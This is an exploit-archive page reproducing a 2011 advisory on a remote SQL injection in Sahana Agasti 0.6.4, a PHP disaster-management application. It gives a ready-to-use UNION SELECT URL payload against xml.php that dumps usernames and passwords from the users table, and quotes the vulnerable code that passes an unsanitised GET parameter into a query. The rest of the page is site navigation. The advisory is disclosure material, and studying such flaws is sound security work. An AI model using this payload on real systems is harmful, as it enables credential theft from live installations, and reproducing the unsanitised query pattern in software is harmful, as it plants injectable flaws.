Sahana Agasti 0.6.4 SQL Injection

Sahana Agasti 0.6.4 SQL Injection: Posted Jan 3, 2011; Authored by dun; Sahana Agasti versions 0.6.4 and below suffer from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | c43b0c9ca78cd8229308c5d4edb24c33144301e739d1ef9fd747857df7113230; Download | Favorite | View

Sahana Agasti 0.6.4 SQL Injection

:::::::-.   ...    ::::::.    :::.
  ;;,   `';, ;;     ;;;`;;;;,  `;;;
  `[[     [[[['     [[[  [[[[[. '[[
   $$,    $$$$      $$$  $$$ "Y$c$$
   888_,o8P'88    .d888  888    Y88
   MMMMP"`   "YmmMMMM""  MMM     YM
 
  [ Discovered by dun \ posdub[at]gmail.com ]
 
################################################################
#  [ Sahana Agasti <= 0.6.4 ]  SQL Injection Vulnerability     #
################################################################
#
# Script: "Agasti is the PHP based project of the Sahana Software Foundation.
#          Based a long-term preparedness for disaster management..."
#
# Script site: http://www.sahanafoundation.org/
# Download: https://launchpad.net/sahana-agasti/
#
# [SQL] Vuln:
# http://site.com/agasti/sahana-0.6.4/www/xml.php?act=add_loc&sel=1/**/UNION/**/SELECT/**/null,concat(CHAR(60,66,82,62),concat_ws(char(58),user_name,password)),null/**/FROM/**/users
#   
#   
# Bug: ./sahana-0.6.4/www/xml.php (lines: 17-21, 200-223)
#
# ...
# $act=$_GET{"act"};                                                          //
#
# if($act=='add_loc')                                                         // (1)
# {
#         _shn_get_level_location();                                          //
# ...
#
# function _shn_get_level_location(){
#         require_once('../3rd/adodb/adodb.inc.php');
#         require_once('../conf/sysconf.inc.php');
#         //Make the connection to $global['db']
#         $db = NewADOConnection($conf['db_engine']);
#        $db ->Connect($conf['db_host'].($conf['db_port']?':'.$conf['db_port']:''),$conf['db_user'],$conf['db_pass'],$conf['db_name']);
#
#
#         $level=$_GET{"sel"};                                                // (2)
#         if($level==1){
#                 echo "none,";
#         }
#         $q = "SELECT location.name,location.loc_uuid,parent_id FROM location WHERE location.opt_location_type={$level}";          // (3) SQL
#         $res_child=$db->Execute($q);
#         if($res_child->EOF)
#         return;
#         while(!$res_child->EOF){
#                 $res=$res.",".$res_child->fields[1];
#                 $res=$res.",".$res_child->fields[0];
#                $res_child->MoveNext();
#        }
#         echo $res;                                                          // (4)
# }
# ... 
#
#
###############################################
 
 
[ dun / 2011-01-01 ]

Top Authors In Last 30 Days

Red Hat 167 files
Ubuntu 107 files
indoushka 53 files
Debian 22 files
nu11secur1ty 18 files
Apple 13 files
Google Security Research 7 files
Gentoo 7 files
CraCkEr 6 files
LiquidWorm 4 files

File Archives

Systems

AIX (428)
Apple (2,016)
BSD (374)
CentOS (57)
Cisco (1,925)
Debian (6,844)
Fedora (1,692)
FreeBSD (1,245)
Gentoo (4,329)
HPUX (879)
iOS (355)
iPhone (108)
IRIX (220)
Juniper (68)
Linux (46,826)
Mac OS X (687)
Mandriva (3,105)
NetBSD (256)
OpenBSD (485)
RedHat (13,921)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,946)
UNIX (9,317)
UnixWare (186)
Windows (6,589)
Other

Sahana Agasti 0.6.4 SQL Injection

Sahana Agasti 0.6.4 SQL Injection

File Archive:

September 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Sahana Agasti 0.6.4 SQL Injection

Share This

Sahana Agasti 0.6.4 SQL Injection

File Archive:

September 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems